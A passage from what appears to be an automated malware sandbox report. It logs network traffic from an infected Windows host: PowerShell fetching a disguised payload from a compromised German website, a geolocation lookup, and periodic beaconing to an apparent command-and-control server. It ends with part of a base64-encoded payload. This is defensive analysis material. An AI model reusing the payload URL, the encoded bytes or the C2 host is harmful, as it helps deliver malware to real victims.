                                                                          Nov 30, 2024 20:15:50.930753946 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.930763006 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.930779934 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.930802107 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.930809975 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.930845976 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.939523935 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.939533949 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.939577103 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.939590931 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.939611912 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.948455095 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.948465109 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.948508978 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.948519945 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.957156897 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.957166910 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.957214117 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.957222939 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.966231108 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.966239929 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.966311932 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.966320038 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.971653938 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.971662998 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.971880913 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.971889973 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.976919889 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.976927996 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.976973057 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.976985931 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.977010965 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.983146906 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.983180046 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.983205080 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.983212948 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.983230114 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.988274097 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:50.988331079 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:50.988337994 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.004545927 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.004606962 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.004614115 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.009989023 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.010019064 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.010045052 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.010051966 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.010088921 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.094924927 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.095031977 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.095057964 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.100744009 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.100754023 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.100775003 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.100785017 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.100795984 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.100832939 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.106004953 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.106014967 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.106031895 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.106055975 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.106065989 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.106092930 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.111396074 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.111404896 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.111423016 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.111443996 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.111454010 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.111480951 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.116650105 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.116661072 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.116811991 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.116839886 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.123358965 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.123368025 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.123421907 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.123450041 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.123471022 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.128791094 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.128832102 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.128858089 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.128882885 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.128897905 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.134033918 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.134089947 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.134115934 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.140717030 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.140779018 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.140801907 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.145982981 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.146034002 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.146048069 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.152096033 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.152170897 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.152190924 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.157304049 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.157383919 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.157409906 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.161895990 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.161982059 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.161990881 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.194324970 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.194443941 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.194459915 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.198596001 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.198605061 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.198651075 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.198661089 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.198692083 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.204240084 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.204282999 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.204289913 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.204297066 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.204341888 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.288184881 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.288197041 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.288254976 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.290564060 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.290572882 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.290648937 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.294260979 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.294322014 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.297640085 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.297699928 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.302031994 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.302103043 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.305670023 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.305732965 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.309081078 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.309142113 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.313414097 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.313472986 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.316804886 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.316895008 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.320486069 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.320547104 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.324239016 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.324292898 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.327935934 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.328022957 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.331330061 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.331387997 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.333638906 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.333693981 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.333702087 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.333724976 CET4434974281.169.145.163192.168.2.4
                                                                          Nov 30, 2024 20:15:51.333743095 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.333767891 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:51.335357904 CET49742443192.168.2.481.169.145.163
                                                                          Nov 30, 2024 20:15:59.554789066 CET49765443192.168.2.423.200.196.138
                                                                          Nov 30, 2024 20:15:59.554850101 CET4434976523.200.196.138192.168.2.4
                                                                          Nov 30, 2024 20:15:59.555578947 CET49765443192.168.2.423.200.196.138
                                                                          Nov 30, 2024 20:15:59.555578947 CET49765443192.168.2.423.200.196.138
                                                                          Nov 30, 2024 20:15:59.555620909 CET4434976523.200.196.138192.168.2.4
                                                                          Nov 30, 2024 20:16:01.238442898 CET4434976523.200.196.138192.168.2.4
                                                                          Nov 30, 2024 20:16:01.239078999 CET49765443192.168.2.423.200.196.138
                                                                          Nov 30, 2024 20:16:01.239100933 CET4434976523.200.196.138192.168.2.4
                                                                          Nov 30, 2024 20:16:01.239988089 CET4434976523.200.196.138192.168.2.4
                                                                          Nov 30, 2024 20:16:01.240067005 CET49765443192.168.2.423.200.196.138
                                                                          Nov 30, 2024 20:16:01.247575998 CET49765443192.168.2.423.200.196.138
                                                                          Nov 30, 2024 20:16:01.247642040 CET4434976523.200.196.138192.168.2.4
                                                                          Nov 30, 2024 20:16:01.247788906 CET49765443192.168.2.423.200.196.138
                                                                          Nov 30, 2024 20:16:01.247800112 CET4434976523.200.196.138192.168.2.4
                                                                          Nov 30, 2024 20:16:01.405716896 CET49765443192.168.2.423.200.196.138
                                                                          Nov 30, 2024 20:16:01.593869925 CET4434976523.200.196.138192.168.2.4
                                                                          Nov 30, 2024 20:16:01.594043016 CET4434976523.200.196.138192.168.2.4
                                                                          Nov 30, 2024 20:16:01.594144106 CET49765443192.168.2.423.200.196.138
                                                                          Nov 30, 2024 20:16:01.597439051 CET49765443192.168.2.423.200.196.138
                                                                          Nov 30, 2024 20:16:01.597464085 CET4434976523.200.196.138192.168.2.4
                                                                          Nov 30, 2024 20:16:02.377387047 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:16:02.422550917 CET497389945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:16:02.546412945 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:16:32.502645969 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:16:32.515189886 CET497389945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:16:32.635169983 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:17:02.600630045 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:17:02.603009939 CET497389945192.168.2.445.88.88.33
                                                                          Nov 30, 2024 20:17:02.725966930 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:17:32.631917953 CET99454973845.88.88.33192.168.2.4
                                                                          Nov 30, 2024 20:17:32.687156916 CET497389945192.168.2.445.88.88.33

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 30, 2024 20:14:59.967379093 CET5447753192.168.2.41.1.1.1
                                                                          Nov 30, 2024 20:15:00.457374096 CET53544771.1.1.1192.168.2.4
                                                                          Nov 30, 2024 20:15:34.518532038 CET5223553192.168.2.41.1.1.1
                                                                          Nov 30, 2024 20:15:34.935862064 CET53522351.1.1.1192.168.2.4
                                                                          Nov 30, 2024 20:15:39.876141071 CET5184553192.168.2.41.1.1.1
                                                                          Nov 30, 2024 20:15:40.295104980 CET53518451.1.1.1192.168.2.4
                                                                          Nov 30, 2024 20:15:42.748219013 CET5425453192.168.2.41.1.1.1
                                                                          Nov 30, 2024 20:15:42.937225103 CET53542541.1.1.1192.168.2.4
                                                                          Nov 30, 2024 20:15:47.308190107 CET5838853192.168.2.41.1.1.1
                                                                          Nov 30, 2024 20:15:47.915463924 CET53583881.1.1.1192.168.2.4
                                                                          Nov 30, 2024 20:15:56.410341024 CET6436453192.168.2.41.1.1.1
                                                                          Nov 30, 2024 20:16:15.875471115 CET5201553192.168.2.41.1.1.1
                                                                          Nov 30, 2024 20:16:39.969088078 CET6277653192.168.2.41.1.1.1
                                                                          Nov 30, 2024 20:17:04.062912941 CET5620853192.168.2.41.1.1.1
                                                                          Nov 30, 2024 20:17:28.172581911 CET5689653192.168.2.41.1.1.1

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Nov 30, 2024 20:14:59.967379093 CET192.168.2.41.1.1.10x4bbcStandard query (0)www.lebensraeume-ggmbh.deA (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:15:34.518532038 CET192.168.2.41.1.1.10xbb9eStandard query (0)www.campingplatz-goldbergersee.deA (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:15:39.876141071 CET192.168.2.41.1.1.10xffd7Standard query (0)www.tla-autos.comA (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:15:42.748219013 CET192.168.2.41.1.1.10x2dc2Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:15:47.308190107 CET192.168.2.41.1.1.10xfd62Standard query (0)www.elektroservice-neuruppin.deA (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:15:56.410341024 CET192.168.2.41.1.1.10x5ce1Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:16:15.875471115 CET192.168.2.41.1.1.10x59f6Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:16:39.969088078 CET192.168.2.41.1.1.10x4909Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:17:04.062912941 CET192.168.2.41.1.1.10xa743Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:17:28.172581911 CET192.168.2.41.1.1.10xe47dStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Nov 30, 2024 20:15:00.457374096 CET1.1.1.1192.168.2.40x4bbcNo error (0)www.lebensraeume-ggmbh.de217.160.0.118A (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:15:34.935862064 CET1.1.1.1192.168.2.40xbb9eNo error (0)www.campingplatz-goldbergersee.de92.205.55.123A (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:15:40.295104980 CET1.1.1.1192.168.2.40xffd7No error (0)www.tla-autos.com45.88.88.33A (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:15:42.937225103 CET1.1.1.1192.168.2.40x2dc2No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:15:47.915463924 CET1.1.1.1192.168.2.40xfd62No error (0)www.elektroservice-neuruppin.deelektroservice-neuruppin.deCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 30, 2024 20:15:47.915463924 CET1.1.1.1192.168.2.40xfd62No error (0)elektroservice-neuruppin.de81.169.145.163A (IP address)IN (0x0001)false
                                                                          Nov 30, 2024 20:15:56.659845114 CET1.1.1.1192.168.2.40x5ce1No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 30, 2024 20:16:16.095136881 CET1.1.1.1192.168.2.40x59f6No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 30, 2024 20:16:40.185730934 CET1.1.1.1192.168.2.40x4909No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 30, 2024 20:17:04.289272070 CET1.1.1.1192.168.2.40xa743No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 30, 2024 20:17:28.313380957 CET1.1.1.1192.168.2.40xe47dNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • www.lebensraeume-ggmbh.de
                                                                          • www.campingplatz-goldbergersee.de
                                                                          • www.elektroservice-neuruppin.de
                                                                          • armmf.adobe.com
                                                                          • geoplugin.net

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.449741178.237.33.50802536C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 30, 2024 20:15:43.063020945 CET71OUTGET /json.gp HTTP/1.1
                                                                          Host: geoplugin.net
                                                                          Cache-Control: no-cache
                                                                          Nov 30, 2024 20:15:44.356525898 CET1171INHTTP/1.1 200 OK
                                                                          date: Sat, 30 Nov 2024 19:15:44 GMT
                                                                          server: Apache
                                                                          content-length: 963
                                                                          content-type: application/json; charset=utf-8
                                                                          cache-control: public, max-age=300
                                                                          access-control-allow-origin: *
                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                          Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.449730217.160.0.1184431620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-11-30 19:15:02 UTC208OUTGET /template/inc_css/specific/Kvidredes.pcz HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: www.lebensraeume-ggmbh.de
                                                                          Connection: Keep-Alive
                                                                          2024-11-30 19:15:02 UTC212INHTTP/1.1 200 OK
                                                                          Content-Length: 479080
                                                                          Connection: close
                                                                          Date: Sat, 30 Nov 2024 19:15:02 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Tue, 26 Nov 2024 17:48:14 GMT
                                                                          ETag: "74f68-627d4741e36fe"
                                                                          Accept-Ranges: bytes
                                                                          2024-11-30 19:15:02 UTC16172INData Raw: 63 51 47 62 63 51 47 62 75 36 59 61 48 51 42 78 41 5a 76 72 41 68 34 38 41 31 77 6b 42 4f 73 43 70 33 6e 72 41 6e 4a 4e 75 52 2f 62 44 74 7a 72 41 74 63 45 36 77 4c 47 43 6f 48 70 49 42 79 64 2b 2b 73 43 42 78 31 78 41 5a 75 42 36 66 2b 2b 63 65 42 78 41 5a 76 72 41 72 54 63 36 77 4b 31 32 4f 73 43 6c 41 53 36 38 70 45 56 37 75 73 43 64 47 4c 72 41 6b 7a 53 63 51 47 62 63 51 47 62 4d 63 72 72 41 6d 71 58 63 51 47 62 69 52 51 4c 63 51 47 62 63 51 47 62 30 65 4c 72 41 71 72 35 36 77 4c 68 55 34 50 42 42 4f 73 43 68 53 6e 72 41 6f 34 56 67 66 6b 61 43 4b 73 46 66 4d 76 72 41 72 68 6f 36 77 4a 38 47 59 74 45 4a 41 54 72 41 6a 31 6e 36 77 4c 56 62 59 6e 44 36 77 4a 77 4d 65 73 43 31 4f 69 42 77 2b 39 2f 6f 51 52 78 41 5a 74 78 41 5a 75 36 45 59 32 67 56 75 73
                                                                          Data Ascii: cQGbcQGbu6YaHQBxAZvrAh48A1wkBOsCp3nrAnJNuR/bDtzrAtcE6wLGCoHpIByd++sCBx1xAZuB6f++ceBxAZvrArTc6wK12OsClAS68pEV7usCdGLrAkzScQGbcQGbMcrrAmqXcQGbiRQLcQGbcQGb0eLrAqr56wLhU4PBBOsChSnrAo4VgfkaCKsFfMvrArho6wJ8GYtEJATrAj1n6wLVbYnD6wJwMesC1OiBw+9/oQRxAZtxAZu6EY2gVus
                                                                          2024-11-30 19:15:03 UTC16384INData Raw: 43 7a 6d 4f 64 76 32 32 45 70 5a 41 64 4a 7a 35 37 2b 51 2b 46 76 43 61 74 2b 67 38 44 54 35 44 74 68 50 57 31 4c 32 38 46 64 79 47 5a 73 38 49 6a 39 66 31 36 30 76 65 46 46 55 6f 62 33 36 41 77 4a 63 34 64 56 49 39 46 57 74 70 35 53 4a 66 46 63 6b 48 45 37 30 47 2b 75 7a 6d 4c 50 51 58 4d 58 41 64 6e 4c 30 32 49 66 57 6f 32 66 51 6e 4a 34 63 6c 6d 72 58 65 75 47 75 55 6c 6c 58 43 5a 41 44 4c 72 59 55 6d 65 70 30 48 74 72 6a 63 61 42 42 42 74 66 62 37 4b 46 4e 59 44 70 47 2f 31 41 53 36 35 44 78 49 4a 65 52 71 66 32 59 69 4d 59 44 30 46 70 64 51 64 39 4f 39 4e 35 45 73 43 41 7a 30 46 68 71 31 50 54 79 39 4c 34 62 78 54 36 4c 38 35 71 54 64 37 52 72 5a 66 4b 42 55 74 43 32 70 4f 6c 58 65 47 6f 64 37 34 55 43 48 76 63 52 47 4e 32 4d 52 45 62 36 33 6a 47 6b
                                                                          Data Ascii: CzmOdv22EpZAdJz57+Q+FvCat+g8DT5DthPW1L28FdyGZs8Ij9f160veFFUob36AwJc4dVI9FWtp5SJfFckHE70G+uzmLPQXMXAdnL02IfWo2fQnJ4clmrXeuGuUllXCZADLrYUmep0HtrjcaBBBtfb7KFNYDpG/1AS65DxIJeRqf2YiMYD0FpdQd9O9N5EsCAz0Fhq1PTy9L4bxT6L85qTd7RrZfKBUtC2pOlXeGod74UCHvcRGN2MREb63jGk
